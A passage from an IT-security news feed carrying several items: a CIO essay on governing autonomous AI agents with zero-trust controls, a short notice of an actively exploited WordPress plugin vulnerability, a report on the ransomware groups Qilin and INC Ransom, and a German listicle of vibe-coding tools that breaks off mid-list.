<p>Microsoft is not alone in pursuing technologies that help enterprises adapt AI systems to their unique business requirements. Rivals such as AWS and Google are also investing in tools that move beyond generic foundation models and allow enterprises to customize AI for enterprise use cases.</p>



<p>Last year in December, <a href="https://www.cio.com/article/4100305/aws-offers-new-service-to-make-ai-models-better-at-work.html">AWS introduced Nova Forge</a>, a model-customization framework that enables enterprises to build specialized versions of foundation models using proprietary data and training checkpoints.</p>



<p>Google, too, offers a similar model training and fine-tuning through the <a href="https://www.computerworld.com/article/4161990/gemini-enterprise-update-brings-ai-agents-into-collaborative-workflows.html">Gemini Enterprise Agent Platform</a>, earlier known as <a href="https://www.infoworld.com/article/2336804/google-updates-vertex-ai-with-new-llm-capabilities-agent-builder-feature.html">Vertex AI</a>. Frontier Tuning, which is currently in private preview, can only be accessed now through Microsoft’s partner-led FDE program. It is expected to be made available via <a href="https://www.infoworld.com/article/3989489/microsoft-aims-to-improve-agent-versatility-with-copilot-studio-updates.html">Copilot Studio</a> and <a href="https://www.infoworld.com/article/4165766/building-ai-apps-and-agents-with-microsoft-foundry.html">Microsoft Foundry</a> soon, Microsoft said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Who authorized the algorithm? Reckoning with ungoverned AI]]></title>
<description><![CDATA[Three business units. One weekend. Zero governance checkpoints. That is what a Fortune 500 CIO I advise discovered last quarter when autonomous AI agents deployed by separate teams accessed customer databases, initiated vendor negotiations and generated compliance reports without a single human s...]]></description>
<link>https://tsecurity.de/de/3569269/it-security-nachrichten/who-authorized-the-algorithm-reckoning-with-ungoverned-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569269/it-security-nachrichten/who-authorized-the-algorithm-reckoning-with-ungoverned-ai/</guid>
<pubDate>Wed, 03 Jun 2026 13:09:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Three business units. One weekend. Zero governance checkpoints. That is what a Fortune 500 CIO I advise discovered last quarter when autonomous AI agents deployed by separate teams accessed customer databases, initiated vendor negotiations and generated compliance reports without a single human sign-off. Nobody verified the context protocols connecting those agents to enterprise systems. Nobody asked whether the AI’s decisions aligned with the company’s risk appetite. Nobody even knew the agents had been activated until Monday morning. The agents simply acted, and the enterprise had no mechanism to hold them accountable.</p>



<p>That scenario captures everything that has changed about the CIO role. <a href="https://journals.sagepub.com/doi/10.1177/02683962241258213" rel="nofollow">Schaper et al. (2025) in the Journal of Information Technology</a> demonstrated through analysis of U.S. firm patent portfolios that CIO characteristics directly shape digital exploration outcomes. The CIO is no longer an operational custodian. Bendig et al. (2023) in MIS Quarterly proved that CIO presence in the top management team shifts organizational attention toward digital innovation. The academic evidence and boardroom reality have converged: the CIO now architects enterprise competitiveness. But competitiveness without governance is recklessness. And most organizations have not caught up.</p>



<h2 class="wp-block-heading">The structural transformation is not incremental</h2>



<p><a href="https://www.deloitte.com/us/en/about/press-room/deloitte-tech-survey-reveals-how-leaders-redefine-enterprise-value.html" rel="nofollow">Deloitte’s 2025 Tech Executive Survey</a> of 622 senior technology leaders found that 65% of CIOs now report directly to the CEO, up from 41% a decade ago. Thirty-six percent manage a profit-and-loss statement. Fifty-two percent of technology organizations are now viewed as revenue generators rather than service centers. Sixty-seven percent of CIOs aspire to the CEO role itself. These are not technologists playing at business. These are business leaders whose technological fluency is the single most potent competitive advantage their enterprises possess.</p>



<p>McKinsey crystallized this in their analysis <a href="https://www.mckinsey.com/capabilities/mckinsey-digital/our-insights/a-new-dawn-for-the-technology-officer" rel="nofollow">A New Dawn for the Technology Officer</a>, identifying four CIO archetypes:</p>



<ul class="wp-block-list">
<li><strong>The Orchestrator</strong>, who leads digital strategy with P&amp;L accountability</li>



<li><strong>The Builder</strong>, who creates AI-native revenue streams</li>



<li><strong>The Protector</strong>, who owns cybersecurity as revenue protection</li>



<li><strong>The Operator</strong>, who integrates technology so deeply into business that the boundary between IT and enterprise vanishes entirely.</li>
</ul>



<p>The <a href="https://www.mckinsey.com/capabilities/mckinsey-technology/our-insights/mckinsey-global-tech-agenda-2026" rel="nofollow">McKinsey Global Tech Agenda 2026</a> confirms that AI investment has surpassed cybersecurity and infrastructure modernization as the number-one CIO priority. Gartner’s 2026 survey of 3,186 respondents across 88 countries found that 94% of CIOs expect major shifts within 24 months, yet only 48% of digital initiatives currently meet targets. The gap between ambition and execution is precisely where CIO leadership matters most.</p>



<h2 class="wp-block-heading">The governance vacuum that nobody is filling</h2>



<p>Here is where strategic elevation collides with operational peril. A <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6221439" rel="nofollow">recent scholarly analysis by Sprongl (2026)</a> argues persuasively that agentic AI does not create governance fragility so much as it exposes existing ambiguity in how organizations allocate decision rights and consequence ownership. When execution velocity exceeds authority response capacity, a structural accountability gap emerges. That gap is the CIO’s problem to solve.</p>



<p>The numbers are sobering. <a href="https://www.mckinsey.com/capabilities/risk-and-resilience/our-insights/deploying-agentic-ai-with-safety-and-security-a-playbook-for-technology-leaders" rel="nofollow">McKinsey’s agentic AI security analysis</a> found that 80% of organizations have encountered risky behaviors from AI agents, including unauthorized data exposure and improper system access. Harvard Business Review’s 2024 analysis revealed a striking disconnect: While 76% of board members use generative AI in some capacity, only 12% of boards turn to the CIO for AI input. That gap is a governance failure waiting to happen. BlackFog’s 2026 survey found 49% of employees using unsanctioned AI tools. IBM’s 2025 Cost of Data Breach Report documented that shadow AI adds $670,000 to average breach costs, with 97% of AI-related breaches lacking proper access controls. CyberArk reports machine identities outnumber human identities 80 to 1 in most enterprises. Each represents an ungoverned attack surface.</p>



<p>The Model Context Protocol (MCP), launched by Anthropic in 2024 to standardize AI-to-enterprise data connections, illustrates the challenge perfectly. Documented incidents already include GitHub MCP data exfiltration, cross-tenant exposure through misconfigured integrations and remote code execution vulnerabilities. A <a href="https://www.ijcaonline.org/archives/volume187/number74/governance-frameworks-for-enterprise-ai-systems-operating-in-regulated-environments/" rel="nofollow">systematic review of enterprise AI governance</a> published in January 2026 found that while data governance and cybersecurity practices are relatively mature, significant weaknesses persist in the oversight of autonomous agentic AI systems. Researchers have confirmed that 41.7% of audited MCP implementations contain serious vulnerabilities.</p>



<h2 class="wp-block-heading">Zero-trust AI governance: The playbook that works</h2>



<p>Working with Fortune 500 clients across financial services, technology, entertainment and travel, I have observed a consistent pattern. Organizations that treat AI governance as a compliance checkbox fail. Organizations that embed zero-trust principles directly into their AI architecture succeed.</p>



<p>Every AI agent’s request to access enterprise data should be treated like an unknown visitor at the front door: verified, scoped and logged. The ContextGuard framework I developed at HCLTech applies zero-trust principles specifically to AI context protocol interactions across four layers: Cryptographic verification of AI server identity before any data exchange, least-privilege scope enforcement limiting each agent to the minimum tool access required for its specific task, continuous behavioral monitoring detecting anomalous agent-to-tool interactions in real time, and immutable audit trail generation aligned with NIST AI Risk Management Framework and ISO/IEC 42001. In practice, this means an agent authorized to query a customer database cannot simultaneously access financial systems or code repositories, even if the underlying MCP server technically supports those connections. The principle is simple: Trust nothing, verify everything, log always.</p>



<p>The <a href="https://cloudsecurityalliance.org/blog/2026/02/02/the-agentic-trust-framework-zero-trust-governance-for-ai-agents" rel="nofollow">Cloud Security Alliance’s Agentic Trust Framework</a> validates this approach, treating agent autonomy as something earned through demonstrated trustworthiness across progressive maturity levels. <a href="https://arxiv.org/abs/2505.11579" rel="nofollow">Engin and Hand’s research on dimensional governance</a> reinforces the point: Static risk categories are insufficient for systems whose autonomy shifts dynamically. Microsoft’s Entra Agent ID, which gives each AI agent its own unique identity within a zero-trust architecture, points in the same direction. The industry is converging on a single insight: autonomous AI requires autonomous governance.</p>



<h2 class="wp-block-heading">The CIO who governs AI will govern the enterprise</h2>



<p>Greg Carmichael went from CIO to CEO of Fifth Third Bancorp. Stephen Gillett moved from CIO of Starbucks to CEO of Google’s cybersecurity subsidiary. Dawn Lepore built Charles Schwab’s e-commerce operation as CIO before becoming CEO of Drugstore.com. Only 6% of Fortune 500 CEOs currently hold technology backgrounds. That number will climb, because when AI touches every revenue stream, every compliance obligation and every competitive decision, the executive who governs that technology at scale possesses an irreplaceable advantage.</p>



<p><a href="https://arxiv.org/abs/2407.10247v2" rel="nofollow">Schmitt’s 2025 research on AI integration in the C-suite</a> argues that existing executive roles are structurally inadequate for governing AI at enterprise scale. Whether the answer is a Chief AI Officer or an expanded CIO mandate, the implication is identical: Technology governance authority is migrating upward. Gartner’s Digital Vanguard CIOs already achieve 71% success rates on digital initiatives versus the 48% average. The differentiator is not budget or talent. It is governance rigor.</p>



<p>The modern CIO is no longer a technologist. The modern CIO is the governance architect of how enterprises think, decide and compete in an AI-mediated economy. The organizations that understand this will dominate their markets. The ones that do not will discover, too late, that the most dangerous decision they ever made was leaving AI governance to chance.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress Plugin Flaw Exposes 500,000+ Sites to Privilege Escalation]]></title>
<description><![CDATA[A critical unauthenticated privilege escalation vulnerability in the Kirki Freeform Page Builder, Website Builder & Customizer WordPress plugin is being actively exploited in the wild, enabling attackers to seize full administrative control of vulnerable sites. Tracked as CVE-2026-8206 and rated ...]]></description>
<link>https://tsecurity.de/de/3569186/it-security-nachrichten/wordpress-plugin-flaw-exposes-500000-sites-to-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569186/it-security-nachrichten/wordpress-plugin-flaw-exposes-500000-sites-to-privilege-escalation/</guid>
<pubDate>Wed, 03 Jun 2026 12:38:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical unauthenticated privilege escalation vulnerability in the Kirki Freeform Page Builder, Website Builder &amp; Customizer WordPress plugin is being actively exploited in the wild, enabling attackers to seize full administrative control of vulnerable sites. Tracked as CVE-2026-8206 and rated CVSS 9.8 (Critical), the flaw affects all Kirki versions from 6.0.0 through 6.0.6. The vulnerability lives inside the handle_forgot_password() function within the plugin’s CompLibFormHandler class, […]</p>
<p>The post <a href="https://cyberpress.org/wordpress-plugin-flaw-exposed/">WordPress Plugin Flaw Exposes 500,000+ Sites to Privilege Escalation</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware Attacks Surge 30% in 2026 as Qilin and INC Ransom Intensify Operations]]></title>
<description><![CDATA[Ransomware attacks surged 30% in the first half of 2026 compared to the same period in 2025, with Qilin and INC Ransom emerging as two of the most prolific and dangerous operators in a crowded criminal ecosystem. Healthcare continues to be the top targeted industry, with 27 incidents in January 2...]]></description>
<link>https://tsecurity.de/de/3568609/it-security-nachrichten/ransomware-attacks-surge-30-in-2026-as-qilin-and-inc-ransom-intensify-operations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568609/it-security-nachrichten/ransomware-attacks-surge-30-in-2026-as-qilin-and-inc-ransom-intensify-operations/</guid>
<pubDate>Wed, 03 Jun 2026 09:08:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1126" height="614" src="https://thecyberexpress.com/wp-content/uploads/Qilin.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Qilin" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Qilin.webp 1126w, https://thecyberexpress.com/wp-content/uploads/Qilin-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/Qilin-1024x558.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Qilin-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/Qilin-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/Qilin-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/Qilin-750x409.webp 750w, https://thecyberexpress.com/wp-content/uploads/Qilin.webp 1126w, https://thecyberexpress.com/wp-content/uploads/Qilin-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/Qilin-1024x558.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Qilin-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/Qilin-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/Qilin-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/Qilin-750x409.webp 750w" sizes="(max-width: 1126px) 100vw, 1126px" title="Ransomware Attacks Surge 30% in 2026 as Qilin and INC Ransom Intensify Operations 1"></p>Ransomware attacks surged 30% in the first half of 2026 compared to the same period in 2025, with Qilin and INC Ransom emerging as two of the most prolific and dangerous operators in a crowded criminal ecosystem. Healthcare continues to be the top targeted industry, with 27 incidents in January 2026 alone, a figure that reflects both the sector's operational sensitivity and the premium value of health records on darknet markets.
<h3>Qilin: The Dominant Force</h3>
Qilin — also known as Agenda — is a ransomware group that entered 2026 accelerating, not slowing down. By early 2026, Qilin had already posted 55 confirmed victims, placing it ahead of its own 2025 pace. By June 2026, tracking <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28541">data</a>, Qilin had accumulated 168 confirmed victims in the healthcare sector alone, behind only manufacturing (291) and business services (245) in overall victim count.

Qilin operates as a Ransomware-as-a-Service (RaaS) platform, recruiting affiliates who conduct attacks using Qilin's ransomware builder and infrastructure in exchange for a percentage of <a href="https://thecyberexpress.com/first-vpn-service-seized/" target="_blank" rel="noopener">ransom</a> proceeds. This model allows the core group to expand operational throughput without directly executing every attack.

The group's double extortion model — encrypting victim data while simultaneously exfiltrating it and threatening public release on their leak site — has proven effective at pressuring victims into paying ransom demands even when robust backups exist. Public exposure of sensitive patient records creates regulatory, legal, and reputational pressure that many <a href="https://thecyberexpress.com/eu-action-plan-to-protect-healthcare-infra/" target="_blank" rel="noopener">healthcare organisations</a> find more immediately damaging than operational downtime.

A notable recent case involves Covenant Health, which suffered a Qilin <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28540">ransomware</a> breach that exposed 478,188 patient records. The Covenant Health incident highlights Qilin's willingness to attack hospitals and health systems regardless of the direct patient safety implications.
<h3>INC Ransom: Targeting Critical Sectors</h3>
INC Ransom is another highly active operator that was among the top ransomware groups by victim count in January 2026, with 47 known attacks that month. The group targets organisations across multiple sectors, including healthcare, legal services, and public administration.

INC Ransom gained significant attention in 2025 for its attack on NHS Scotland, which exposed 3 terabytes of patient data. The group continues to operate aggressively in 2026, targeting entities including healthcare practices, municipal agencies, and regional service providers.

Recent INC Ransom victims include healthcare organisations such as Lymphedema Therapy Specialists, Inc. (February 2026, affecting 378 Texas patients) and various municipal and public sector entities, including Champaign-Urbana Public Health District.
<h3>The 2026 Ransomware Landscape</h3>
Beyond Qilin and INC Ransom, the broader <a href="https://www.blackfog.com/the-state-of-ransomware-may-2026/" target="_blank" rel="nofollow noopener">2026 ransomware ecosystem</a> is characterised by:
<ul>
 	<li>AI-assisted operations: Multiple ransomware groups are now using AI tools to accelerate <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noopener" title="phishing" data-wpil-keyword-link="linked" data-wpil-monitor-id="28544">phishing</a> campaign creation, target research, and initial access operations, reducing the operational cost of launching attacks.</li>
 	<li>Healthcare as a premium target: Patient records sell for up to 10 times as much as financial records on darknet markets, making it a persistently attractive target. Operational disruption of healthcare services also creates patient-safety leverage that can pressure organisations to make faster payment decisions.</li>
 	<li>The Play and SafePay operators were also confirmed in recent June 2026 attack disclosures, targeting organisations including Clínica Maitenes and various regional businesses.</li>
</ul>
<h3>Why It Matters</h3>
The 30% year-over-year increase in ransomware incidents confirms that neither <a href="https://thecyberexpress.com/cyber-resilience-in-healthcare/" target="_blank" rel="noopener">law enforcement</a> action nor improved defensive capabilities has materially reduced the operational tempo of ransomware criminal enterprises. The professionalisation of RaaS platforms, combined with AI-assisted tooling and shortened attack timelines, is creating conditions in which even well-defended organisations face materially elevated <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risk" data-wpil-keyword-link="linked" data-wpil-monitor-id="28543">risk</a>.

For healthcare specifically, the combination of operational sensitivity, high data value, and historically underfunded security programmes creates a structural <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28542">vulnerability</a> that the industry has not yet resolved despite years of high-profile attacks.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe-Coding-Tools – 19 empfehlenswerte Optionen]]></title>
<description><![CDATA[Vibe-Coding-Tools können dazu beitragen, die App-Entwicklung zu demokratisieren.BalanceFormCreative | shutterstock.com



Vibe Coding verspricht zwar seit seinem Aufkommen, die Softwareentwicklung wesentlich zu beschleunigen und zu demokratisieren, ist aber – insbesondere in einem professionellen...]]></description>
<link>https://tsecurity.de/de/3568348/it-security-nachrichten/vibe-coding-tools-19-empfehlenswerte-optionen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568348/it-security-nachrichten/vibe-coding-tools-19-empfehlenswerte-optionen/</guid>
<pubDate>Wed, 03 Jun 2026 07:23:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/BalanceFormCreative_shutterstock_2269128885_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Coding Demokratisierung 16z9" class="wp-image-4176431" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Vibe-Coding-Tools können dazu beitragen, die App-Entwicklung zu demokratisieren.</figcaption></figure><p class="imageCredit">BalanceFormCreative | shutterstock.com</p></div>



<p>Vibe Coding verspricht zwar seit <a href="https://www.computerwoche.de/article/4086780/vibe-coding-erklart.html" target="_blank">seinem Aufkommen</a>, die Softwareentwicklung wesentlich zu beschleunigen und zu demokratisieren, ist aber – insbesondere in <a href="https://www.computerwoche.de/article/4152349/so-wird-ki-zum-compiler.html" target="_blank">einem professionellen Umfeld</a> – nicht unumstritten.</p>



<p>Inzwischen sind die Tools in diesem Bereich allerdings reif genug, um die anfänglichen Versprechen auch einzulösen. Zumindest, wenn es um Prototypen oder ein Minimum Viable Product (<a href="https://www.computerwoche.de/article/2772171/5-fragen-zum-mvp.html" target="_blank">MVP</a>) geht. Nur ein paar Textanweisungen, schon entspringt der KI etwas, das früher Wochen in Anspruch genommen hätte. Ganz zu schweigen vom damit verbundenen bürokratischen Aufwand für Business-Anwender.</p>



<p>Natürlich kann es beim Vibe Coding weiterhin zu <a href="https://www.computerwoche.de/article/4034385/9-wege-mit-vibe-coding-zu-scheitern.html" target="_blank">Fehlern und Versäumnissen</a> kommen. Dabei stellt sich allerdings die Frage, ob das schlimmer ist als das, was ein menschliches Team versehentlich verbocken oder übersehen könnte, wenn es das gleiche erstellt.</p>



<p>In diesem Artikel stellen wir Ihnen in aller Kürze 19 empfehlenswerte Vibe-Coding-Tools vor.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">Vibe coding now has an official illustrative GIF! <a href="https://t.co/dHKuJwTBzj">https://t.co/dHKuJwTBzj</a></p>— Simon Willison (@simonw) <a href="https://x.com/simonw/status/1903872293438406885?ref_src=twsrc%5Etfw">March 23, 2025</a></blockquote>
</div></figure>



<h2 class="wp-block-heading"><a href="https://base44.com/" target="_blank" rel="noreferrer noopener">Base44/Wix</a></h2>



<p>Im Fall von Base44 (inzwischen im Besitz <a href="https://www.wix.com/press-room/home/post/wix-further-expands-into-vibe-coding-with-acquisition-of-base44-a-hyper-growth-startup-that-simplif" target="_blank" rel="noreferrer noopener">von Wix</a>), beginnt mit einem „Builder Chat“, der die Datenarchitektur fokussiert. Davon ausgehend erstellt das Vibe-Coding-Tool auf Basis natürlichsprachlicher Anweisungen React- und Tailwind-Code für das Frontend, die in einem Deno-Backend zusammengeführt werden.</p>



<p>Um den Entwicklungsprozess zusätzlich zu beschleunigen, stehen diverse Templates für gängige Anwendungsfälle zur Verfügung, etwa in den Bereichen E-Commerce, Content-Management und Produktivität. Die <a href="https://www.computerwoche.de/article/3990415/wird-ki-das-neue-ui.html" target="_blank">Benutzeroberfläche</a> dieser Lösung lässt sich dabei über einen visuellen Editor im Drag-und-Drop-Verfahren anpassen.</p>



<h2 class="wp-block-heading"><a href="https://www.bettyblocks.com/" target="_blank" rel="noreferrer noopener">Betty Blocks</a></h2>



<p>Die Macher hinter der <a href="https://www.computerwoche.de/article/2802722/was-sie-ueber-no-code-plattformen-wissen-muessen.html" target="_blank">No-Code-Lösung</a> Betty Blocks wollen in erster Linie „Citizen Developer“ ansprechen – also Nicht-Programmierer, die jedoch wissen, welche Art von Anwendung ihr Fachbereich benötigt.</p>



<p>Aus der natürlichsprachlichen Beschreibung dieser Applikation erzeugt die Betty-Blocks-Plattform <a href="https://www.computerwoche.de/article/4144312/react-ein-tutorial.html" target="_blank">React-Code</a>. Dieser wird zur „Weiterverarbeitung“ in ein Code Repository exportiert – kann jedoch auch für zukünftige Deployment-Zwecke auf <a href="https://www.computerwoche.de/article/3968392/6-webassembly-fahige-sprachen.html" target="_blank">WASM</a>-Ebene kompiliert werden. Darüber hinaus bietet die Lösung auch einen Low-Code-Ansatz an, der eine visuelle Oberfläche für weitere Anpassungen und Verfeinerungen bereitstellt.</p>



<h2 class="wp-block-heading"><a href="https://blink.new/" target="_blank" rel="noreferrer noopener">Blink</a></h2>



<p>Der Code-Agent von Blink erstellt TypeScript-React-Anwendungen und bietet zwei Modi: den Agent-Modus (zum Erstellen) und den Chat-Modus (zum Planen).</p>



<p>Blink hostet jede Anwendung über sein internes <a href="https://www.computerwoche.de/article/2750121/was-sie-ueber-content-delivery-networks-wissen-muessen.html" target="_blank">Content Delivery Network</a>, ermöglicht es aber auch, diese auf eigene Server oder in die Cloud zu exportieren.</p>



<h2 class="wp-block-heading"><a href="https://bolt.new/" target="_blank" rel="noreferrer noopener">Bolt</a></h2>



<p>Der No-Code-Service von Bolt wurde mit dem Ziel entwickelt, ein singuläres visuelles Interface zu verschiedenen Backend-Coding-KIs bereitzustellen. Entsprechend ist es möglich, mit diversen verschiedenen Agenten zu arbeiten, darunter etwa Claude und Gemini.  </p>



<p>Weil das Tool über einen eigenständigen Design-Layer verfügt, lassen sich Standard-Designs erstellen, die dann von jeder App genutzt werden können, die die KI erzeugt. Bolt steht zudem als <a href="https://github.com/stackblitz/bolt.new" target="_blank" rel="noreferrer noopener">Open-Source-Version</a> zur Verfügung, die unter der MIT-Lizenz veröffentlicht wurde.</p>



<h2 class="wp-block-heading"><a href="http://bubble.io/" target="_blank" rel="noreferrer noopener">Bubble</a></h2>



<p>Auch bei Bubble handelt es sich um ein No-Code-Tool. Dieses umfasst verschiedene Funktionen, die weit über einen bloßen Chat hinausgehen. Ein visueller Editor ist ebenfalls mit an Bord, um die Benutzeroberfläche schnell und einfach auf die eigenen Bedürfnisse anzupassen.</p>



<p>Eine Workflow-Ansicht verschafft zudem Überblick über vieles, was im Hintergrund abläuft – und schafft damit Transparenz für die Benutzer. Die Zielsetzung dieses Tools besteht darin, den Menschen stärker als <a href="https://www.computerwoche.de/article/4086726/der-wahre-hebel-fur-ki-ist-der-mensch.html" target="_blank">Partner der KI</a> einzubinden.</p>



<h2 class="wp-block-heading"><a href="https://claude.com/product/claude-code" target="_blank" rel="noreferrer noopener">Claude Code</a></h2>



<p>Anthropics Vorzeige-LLM <a href="https://www.computerwoche.de/article/4141035/claude-code-im-praxistest.html" target="_blank">Claude</a> kann diverse Programmieraufgaben übernehmen – beispielsweise neue Applikationen erstellen oder alte reparieren. Das Backend lässt sich mit vielen traditionellen IDEs wie <a href="https://www.computerwoche.de/article/4123522/visual-studio-code-langweilig-aber-noch-on-top.html" target="_blank">Visual Studio Code</a> verbinden – oder auch mit einem Slack-Kanal.</p>



<p>Eine populärer Anwendungsfall für Claude Code ist, große Codebasen zu durchsuchen, um Probleme zu finden und zu beheben. Anwender loben außerdem, dass sich Claude sehr gut auf lokale Codierungsstandards ausrichten lässt.</p>



<h2 class="wp-block-heading"><a href="https://github.com/continuedev/continue" target="_blank" rel="noreferrer noopener">Continue</a></h2>



<p>Der quelloffene KI-Agent von Continue eignet sich am besten für <a href="https://www.computerwoche.de/article/4133885/darum-werden-ihre-besten-entwickler-langsamer.html" target="_blank">professionelle Entwickler</a>, die bei ihrer Arbeit zusätzliche Unterstützung wünschen. Das Tool überwacht Codebasen auf spezifische Trigger, beispielsweise neue Pull-Releases – und schaltet dann KI-Agenten ein, um diverse Routineaufgaben zu erledigen.</p>



<p>Die Zielsetzung bei diesem Tool besteht darin, menschlichen Profis die langweiligsten Tasks zu ersparen, damit diese sich darauf konzentrieren können, kreativ zu sein. Continue lässt sich in diverse IDEs und <a href="https://www.computerwoche.de/article/4004872/die-besten-apis-um-ki-zu-integrieren.html" target="_blank">KI-APIs</a> integrieren.</p>



<h2 class="wp-block-heading"><a href="http://create.xyz/" target="_blank" rel="noreferrer noopener">Create.xyz</a></h2>



<p>Das Tool von Create.xyz heißt “Anything” und soll jede erdenkliche React/Tailwind-App aus einem simplen Text-<a href="https://www.computerwoche.de/article/4042963/5-tipps-um-besser-zu-prompten.html" target="_blank">Prompt</a> erstellen können.</p>



<p>Die Ergebnisse werden aus vielen stilisierten Komponenten für Tasks, die sowohl im Browser als auch auf mobilen Plattformen gut laufen (etwa <a href="https://www.computerwoche.de/article/3497295/datenbank-how-to-fur-app-entwickler.html" target="_blank">Datenbankzugriff</a>) generiert. Entwickler können sich dann tiefgehend mit dem Code auseinandersetzen und persönliche Akzente setzen.</p>



<h2 class="wp-block-heading"><a href="https://cursor.com/" target="_blank" rel="noreferrer noopener">Cursor</a></h2>



<p>Vor allem Entwickler der alten Schule finden häufig Gefallen an Cursor. Dieses Tool generiert neuen Code, überprüft alten und trackt entstehende Probleme – zum Beispiel über <a href="https://www.computerwoche.de/article/3842841/7-slack-apps-fur-teamarbeiter.html" target="_blank">Slack</a>.</p>



<p>Zudem ist diese Lösung in der Lage, mehrere Dateien gleichzeitig zu bearbeiten und komplette Codebasen zu analysieren, bevor sie einen Aktionsplan vorschlägt. Cursor ist vor allem für den Einsatz in traditionellen Entwicklungsumgebungen konzipiert.</p>



<h2 class="wp-block-heading"><a href="http://emergent.sh/" target="_blank" rel="noreferrer noopener">Emergent</a></h2>



<p>Die Webanwendung von Emergent ist ein Frontend für <a href="https://www.computerwoche.de/article/4157192/multi-agenten-systeme-die-neuen-microservices.html" target="_blank">KI-Agenten-Teams</a>. Aus einer einfachen Text-Beschreibung entsteht ein Frontend (React), ein Backend (Node.js), Datenbanken (<a href="https://www.computerwoche.de/article/4128783/4-self-contained-datenbanken-fur-entwickler.html" target="_blank">MongoDB</a>) sowie eine Sammlung von APIs mit vollständiger Integration (Stripe und Co.).</p>



<p>Die Zielsetzung ist es, die gesamte Development-Komplexität zu abstrahieren. Das soll Nicht-Entwicklern ermöglichen, alles zu erstellen, was sie wollen. Entwickler können es beispielsweise für  Prototypen nutzen – die <a href="https://www.computerwoche.de/article/4124442/ki-prototypen-in-die-produktion-uberfuhren-so-gehts.html" target="_blank">nahezu produktionsreif</a> sind.</p>



<h2 class="wp-block-heading"><a href="https://kilo.ai/" target="_blank" rel="noreferrer noopener">Kilo Code</a></h2>



<p>Der Open-Source-Agent von Kilo verfügt über eine Reihe von Funktionen, die für Programmierer interessant sind. Insbesondere solche, die regelmäßig größere Codebasen <a href="https://www.computerwoche.de/article/2824308/so-entwickeln-sie-besser.html" target="_blank">pflegen und erweitern</a>. Der Orchestrator-Modus hilft beispielsweise dabei, Arbeitspläne zu erstellen, die Code-Review-Funktion überprüft auf Fehler.</p>



<p>Eine Memory Bank speichert dabei übergeordnete Details zur Architektur des Projekts. Durch die Anbindung an mehr als 500 KI-Modelle dürften Anwender keine Probleme damit haben, <a href="https://www.computerwoche.de/article/4155050/25-fragen-die-zum-richtigen-llm-fuhren.html" target="_blank">das richtige für ihre Zwecke</a> zu integrieren. Zudem wird so die Bindung an einen (LLM-)Anbieter vermieden.</p>



<h2 class="wp-block-heading"><a href="https://www.lindy.ai/" target="_blank" rel="noreferrer noopener">Lindy</a></h2>



<p>Das Tool von Lindy ist darauf ausgelegt, „Agenten“ zu erstellen, bei denen es sich in der Regel um Code-Schnipsel handelt, die im Hintergrund arbeiten. Diese reagieren auf bestimmte Trigger wie eine Slack-Nachricht oder einen neuen Commit in einem Repository.</p>



